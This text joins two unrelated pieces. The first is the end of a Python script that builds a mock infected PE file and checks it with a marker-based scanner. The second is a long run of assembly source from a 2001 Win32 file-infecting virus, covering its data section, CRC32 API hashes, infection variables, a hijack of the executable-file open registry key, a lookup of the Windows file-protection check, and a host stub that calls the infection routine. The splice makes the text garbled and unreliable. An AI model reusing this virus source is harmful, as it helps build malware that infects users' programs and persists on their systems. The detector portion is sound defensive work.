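    for name, rva, chars in ((b".text", 0x1000, 0x60000020), (b".reloc", 0x3000, 0x42000040)):
        img += struct.pack("<8sIIIIIIHHI", name, 0x200, rva, 0x200, 0x400, 0, 0, 0, 0, chars)
    if infected:
        img[2:4] = bytes([OPCODE_JMP_SHORT, 0x3E])     # jmp short to offset 0x42
        struct.pack_into("<H", img, 0x18, 0)
        loader = b"\xEB\x11" + LOADER_HEAD + b"\0" * 4 + LOADER_SEH_TAIL
        img[0x40:0x40 + len(loader)] = loader
        img[0x53:0x53 + len(STUB_MSG)] = STUB_MSG
        struct.pack_into("<I", img, e_lfanew + 40, 0)  # entry point cleared
        reloc_hdr = e_lfanew + 24 + 224 + 40
        struct.pack_into("<I", img, reloc_hdr + 36, 0x40 | RELOC_EXEC_WRITE)
    return bytes(img)


if __name__ == "__main__":
    print("infected sample:", scan_pe(build_sample(True)))
    print("clean sample:", scan_pe(build_sample(False)))
```

Treat two or more markers together as a hit; entry_point_zero alone also matches some legitimate DLLs.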

; -------------------------------
; Virus data
; -------------------------------

KERNEL32 DD 00H

Hostentry DD 00H

CRC32 DD 00H

Key32 DD 00H

Count DD 00H

STARTUPINFO DD 00H

ProcessInfo DD 00H

CMDline DD 00H

Cmdspawn DD 00H

Cmdexefile DD 00H

RNDSEED_1 DD 00H

RNDSEED_2 DD 00H

RNDSEED_3 DD 00H

RNDSEED_4 DD 00H

RNDSEED_5 DD 00H
RNDSEED_6 DD 00H

; Export table data

; -------------------------------

ET_MAXNAMES DD 00H

ET_PTRNAMES DD 00H

ET_PTRADDRESSES DD 00H

ET_PTRORDINALS DD 00H

ET_TMPADDRESS DD 00H

; Infection data

; -------------------------------

FILENAME DD 00H

FileAttribs DD 00H

FILSIZE DD 00H

FileHandle DD 00H

Filemapping DD 00H

FileView DD 00H

Filetime_created DD 00h, 00h

Filetime_accessed DD 00h, 00h

Filetime_Written DD 00h, 00h

FILE_IMAGEBASE DD 00H

FILE_ENTRYPOINT DD 00H

File_sections DD 00H

FILE_SECTIONHEADER DD 00H

File_sectionsize dd 00h

FILE_SECTIONRAW DD 00H

FILE_SECTIONRVA DD 00H

FileInfected DD 00H

KERNEL_API_CRC32:

_Exitprocess DD 040F57181H

_CreateProcess DD 0267E0B05H

_LoadLibrary DD 04134D1ADH

_GetProcaddress DD 0FFC97C1FH

_GlobalAlloc DD 083A353C3H

_GetModuleFileName DD 004DCF392H

_GetStartupinfo DD 052CA6A8DH

_GetCommandline DD 03921BF03H

_GetWindowsDirectory DD 0FE248274H

_CloseHandle DD 068624A9DH

_Createfile DD 08C892DDFH

_CreateFilemapping DD 096B2D96CH

_MapViewoffile DD 0797B49ECH

_UnmapViewoffile DD 094524B42H

_GetfileAttributes DD 0C633D3DEH

_SETFILEATTRIBUTES DD 03C19E536H

_GetfileSize DD 0ef7D811BH

_Getfiletime DD 04434E8FEH

_SETFILETIME DD 04B2A3E7DH

_CopyFile DD 05BD05DB1H

_GettickCount DD 0613FD7BAH

_GetsystemTIME DD 075B7EBE8H

_SLEP DD 00ac136BAH

_LSTRCAT DD 0C7DE8BACH

DD 00000000h

KERNEL_API_ADDR:

EXITPROCESS_ DD 0

CREATEPROCESS DD 0

LoadLibrary DD 0

GetProcaddress DD 0

GLOBALLOC DD 0

GetModuleFileName DD 0

GetStartupInfo DD 0

Getcommandline DD 0

GetWindowsDirectory DD 0

CloseHandle DD 0

CreateFile DD 0

CreateFilemapping DD 0

MapViewOffile DD 0

UnmapViewoffile DD 0

GetFileAttributes DD 0

SetFileAttributes DD 0

GetFileSize DD 0
GetFileTime DD 0

SetFileTime DD 0

CopyFile DD 0

GetTickCount DD 0

GetSystemTime DD 0

Sleep DD 0

LSTRCAT DD 0

User_api_crc32:

_MessageBox DD 0D8556CF7H

_wsprintf DD 0A10A30B6H

DD 00000000h

User_API_Addr:

Messagebox DD 0

WSPRINTF DD 0

Advapi_api_crc32:

_REGOPENKEYEX DD 0CD195699H

_REGCLOSEKEY DD 0841802AFH

_RegSetValueex DD 05B9EC9C6H

_RegSetValue DD 0e78187CEH

DD 00000000h

Advapi_API_Addr:

RegopenKeyex DD 0

RegcloseKey DD 0

RegSetValueex DD 0

RegSetValue DD 0

Strings:

SzvirusName DB Virus_Name, 0

Szviruscredits DB '[', Virus_Name, ']', Virus_Version, CRLF

DB '(c) 2001 by Dr. Watcom', CRLF, CRLF

DB 'Communio Gets US Closer To Our Dark Father', CRLF

DB 'Come, Share Your Vitae with me', CRLF, 0

Szuser32 DB 'User32.dll', 0

SZADVAPI32 DB 'Advapi32.dll', 0

SZSFC DB 'sfc.dll', 0

SzsfcProc DB 'sfcisfileprotected', 0

SzregKey DB 'EXEFILE / Shell / Open / Command', 0

SzregValue DB spawn_name, '', 1, '"% 1"% *', 0

Szspawnfile db '/', spawn_name, 0

Padding DD?

End:

; -------------------------------
; Host code
; -------------------------------

Fakehost:

Mov ESI, Offset Szbait

Call infectfile

SUB ESP, 1024

MOV ESI, ESP

Push 2

Push virus_size

Push virus_size

Push offset sztemplate

PUSH ESI

Call_wsprintfa

Push 1040h

Push offset sztitle

PUSH ESI

PUSH 0

Call Messageboxa

Add ESP, 1024

Fakehost_quit:

PUSH 0

Call EXITPROCESS


End Start

End
